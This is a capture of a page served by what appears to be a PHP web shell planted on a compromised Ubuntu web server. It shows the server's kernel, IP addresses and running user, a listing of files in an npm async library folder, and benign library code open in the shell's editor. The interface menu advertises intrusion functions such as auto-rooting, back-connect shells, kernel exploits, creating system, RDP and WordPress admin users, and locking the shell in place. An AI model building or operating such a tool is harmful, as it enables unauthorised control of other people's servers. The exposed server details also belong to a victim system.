Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
async /
internal /
[ HOME SHELL ]
Name
Size
Permission
Action
DoublyLinkedList.js
2.29
KB
-rw-r--r--
applyEach.js
1.03
KB
-rw-r--r--
breakLoop.js
226
B
-rw-r--r--
consoleFunc.js
1.2
KB
-rw-r--r--
createTester.js
1.25
KB
-rw-r--r--
doLimit.js
293
B
-rw-r--r--
doParallel.js
600
B
-rw-r--r--
doParallelLimit.js
653
B
-rw-r--r--
eachOfLimit.js
1.96
KB
-rw-r--r--
filter.js
2.12
KB
-rw-r--r--
findGetResult.js
200
B
-rw-r--r--
getIterator.js
307
B
-rw-r--r--
initialParams.js
514
B
-rw-r--r--
iterator.js
1.43
KB
-rw-r--r--
map.js
903
B
-rw-r--r--
notId.js
180
B
-rw-r--r--
once.js
312
B
-rw-r--r--
onlyOnce.js
361
B
-rw-r--r--
parallel.js
1.11
KB
-rw-r--r--
queue.js
5.64
KB
-rw-r--r--
reject.js
541
B
-rw-r--r--
setImmediate.js
1021
B
-rw-r--r--
slice.js
407
B
-rw-r--r--
withoutIndex.js
284
B
-rw-r--r--
wrapAsync.js
616
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : consoleFunc.js
'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = consoleFunc; var _arrayEach = require('lodash/_arrayEach'); var _arrayEach2 = _interopRequireDefault(_arrayEach); var _slice = require('./slice'); var _slice2 = _interopRequireDefault(_slice); var _wrapAsync = require('./wrapAsync'); var _wrapAsync2 = _interopRequireDefault(_wrapAsync); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function consoleFunc(name) { return function (fn /*, ...args*/) { var args = (0, _slice2.default)(arguments, 1); args.push(function (err /*, ...args*/) { var args = (0, _slice2.default)(arguments, 1); if (typeof console === 'object') { if (err) { if (console.error) { console.error(err); } } else if (console[name]) { (0, _arrayEach2.default)(args, function (x) { console[name](x); }); } } }); (0, _wrapAsync2.default)(fn).apply(null, args); }; } module.exports = exports['default'];
Close